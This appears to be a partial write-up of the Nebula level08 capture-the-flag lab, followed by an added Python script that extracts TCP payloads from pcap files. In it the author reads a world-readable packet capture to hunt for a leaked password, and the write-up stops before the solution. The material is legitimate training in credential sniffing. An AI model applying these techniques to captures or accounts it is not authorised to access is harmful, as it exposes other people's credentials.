Nebula writeup level08

Author: wellsleep (Liu Zheng)

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Source code

There is no source code available for this level.


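When I first opened the directory I was baffled: it contained only a capture.pcap file created by root. Opening it in Vim showed gibberish, and running strings capture.pcap faintly revealed a few ASCII characters spelling "password". After some Googling, I found that pcap is the file extension for Wireshark capture files, and that tcpdump can also generate and read them. The target environment has no Wireshark, though, so I tried opening the file with tcpdump.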

$ tcpdump -r capture.pcap > ~/readable.txt

Opening the result, it was full of packets in a format like the following:

21:23:12.267566 IP 59.233.235.218.39247 > 59.233.235.223.12121: Flags [S], seq 2635601089, win 14600, options [mss 1460,sackOK,TS val 18592800 ecr 0,nop,wscale 7], length 0

21:23:12.267694 IP 59.233.235.223.12121 > 59.233.235.218.39247: Flags [S.], seq 3131636289, ack 2635601090, win 14480, options [mss 1460,sackOK,TS val 46280417 ecr 18592800,nop,wscale 5], length 0

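Even the "password" characters I had found earlier were gone, so I guess the information tcpdump displays is incomplete. The only option was to copy the file out first and read it with proper Wireshark.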

$ scp /home/flag08/capture.pcap liuz@192.168.3.2:/home/liuz
My respects to the master.
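Added example, not part of the original writeup: a small Python reader for the classic pcap format that prints the TCP payload bytes, which the one-line summaries from `tcpdump -r` leave out. It assumes a microsecond-resolution pcap with Ethernet link type and IPv4; the function names `tcp_payloads` and `build_sample` are hypothetical, and the sample capture is constructed (addresses borrowed from the output above, checksums left at zero).

```python
import struct
import sys

def tcp_payloads(pcap_bytes):
    """Yield (src, dst, payload) for each IPv4/TCP packet that carries data."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic microsecond pcap file")
    linktype, = struct.unpack_from(endian + "I", pcap_bytes, 20)
    if linktype != 1:
        raise ValueError("only Ethernet (linktype 1) is handled")
    off = 24                                   # global header is 24 bytes
    while off + 16 <= len(pcap_bytes):
        # Record header: ts_sec, ts_usec, incl_len, orig_len
        incl_len, = struct.unpack_from(endian + "I", pcap_bytes, off + 8)
        frame = pcap_bytes[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len, = struct.unpack_from("!H", ip, 2)
        tcp = ip[ihl:total_len]                # drops Ethernet padding
        if ip[9] != 6 or ihl < 20 or len(tcp) < 20:          # 6 = TCP
            continue
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data = tcp[(tcp[12] >> 4) * 4:]        # skip TCP header and options
        if data:
            src = "%s.%d" % (".".join(map(str, ip[12:16])), sport)
            dst = "%s.%d" % (".".join(map(str, ip[16:20])), dport)
            yield src, dst, data

def build_sample():
    """Constructed capture: one SYN (no data) and one data segment."""
    def frame(flags, payload):
        tcp = struct.pack("!HHIIBBHHH", 12121, 39247, 1, 1, 5 << 4, flags, 14480, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                         bytes([59, 233, 235, 223]), bytes([59, 233, 235, 218]))
        pkt = b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload
        return struct.pack("<IIII", 0, 0, len(pkt), len(pkt)) + pkt
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return header + frame(0x02, b"") + frame(0x18, b"Password: ")

if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for src, dst, payload in tcp_payloads(raw):
        print(src, ">", dst, repr(payload))
```

Run with a capture path as the only argument to read a real file; with no argument it reads the constructed sample.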